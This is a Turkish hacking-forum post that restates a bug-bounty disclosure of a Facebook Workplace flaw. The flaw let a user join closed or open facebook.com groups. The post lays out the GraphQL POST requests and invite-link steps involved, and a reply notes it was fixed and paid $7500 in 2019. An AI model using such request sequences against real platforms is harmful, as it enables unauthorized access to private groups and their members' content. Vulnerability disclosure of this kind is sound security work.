Kapalı Veya Açık Gruplara Üye Olma

M3m0ry

Kıdemli Üye
3 Haz 2017
4,410
125
3
xD
Kapalı Veya Açık Gruplara Üye Olma

Bu bug; saldırganın, workplace platformunu kullanarak kendisini kapalı ve açık gruplara üye olarak eklemesini sağlar.



1- Workplace'ye gidiniz.

https://work.facebook.com/work/admin/user_sets/

2- İnsan set'i oluştur.

POST /api/graphql/ HTTP/1.1

Host: work.facebook.com
variables={“input”:{“client_mutation_id”:”11",”actor_id”:”actorid”,”name”:”myset-test”,”external_id”:””}}&doc_id=1801011926626947

3- Work ID'nizi oluşturulan set'e ekleyiniz.

POST /api/graphql/ HTTP/1.1

Host: work.facebook.com
variables={“input”:{“client_mutation_id”:”12",”actor_id”:”actorid”,”member_id”:”[work_profile_id]”,”scim_company_group_id”:”[set_id_created]”}}&doc_id=1690433404336349

4- Work profilinizi normal gruba ekleyiniz. (grup www.facebook.com'da değil)

POST /api/graphql/ HTTP/1.1
Host: work.facebook.com
variables={“input”:{“client_mutation_id”:”14",”actor_id”:”actorid”,”rule_id”:”[set_id_created]”,”groups_ids”:[“normal_group”]}}&doc_id=1798717653514339

* normal_group * : Normal grup, www.facebook.com'da oluşturulmuş kapalı veya açık bir gruba denir. (work placede olmayan)

— — — — — — — — — — — — — — — -

Bu noktada, çalışma kullanıcısı yeni iletiler ve diğer şeylerin bildirimini alabilir.

Ama burayı ziyaret edince; https://work-id.facebook.com/groups/[normal_group] Şuraya yönlendirilirler;

https://www.facebook.com/groups/[normal_group] Kişisel profile. (grupta olmayan üye)

Çözüm: Work platformuna gruptan kişisel kullanıcı eklemeyi deniyelim.

Bu linki ziyaret edin;

https://work-id.m.facebook.com/groups/members/search/?group_id=[normal_group]

Bu davet linkini göreceksiniz.

https://fb.me/g/AAAAAAAAAA

Linke tıklayın ve gruba kişisel bir hesap gibi katılabilirsiniz. (grup üyelerini görebilme, ileti atabilme vs..)

Source(Orjinal): Click Me

Source2: Click Me

 
Son düzenleme:

R4V3N

Adanmış Üye
3 Tem 2016
6,250
38
25
Kocaeli
Emeğine sağlık kardeşim :)

++ timeline'ı unutmuşuz:

Timeline
Ağustos 22, 2019 — Rapor gönderildi
Eylül 4, 2019 — Facebook tarafından kabul edildi
Eylül 10, 2019 — Facebook tarafından düzeltildi
Ekim 16, 2019 — Facebook tarafından ödüllendirilme yapıldı ($7500)
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.